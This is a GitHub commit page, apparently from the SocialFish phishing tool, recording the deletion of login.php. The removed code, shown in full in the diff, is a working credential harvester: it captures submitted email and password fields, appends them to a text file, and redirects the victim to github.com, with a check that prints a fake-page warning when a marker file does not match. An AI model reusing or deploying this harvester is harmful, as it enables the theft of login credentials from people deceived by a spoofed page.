Delete login.php

This commit is contained in:
An0nUD4Y 2018-04-25 12:20:09 +05:30 committed by GitHub
parent d80fb69230
commit 0191144cbd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,15 +0,0 @@
<?php
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
if($myFile == $searchString) {
file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location: https://github.com');
}
if($myFile != $searchString) {
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
}
exit();
?>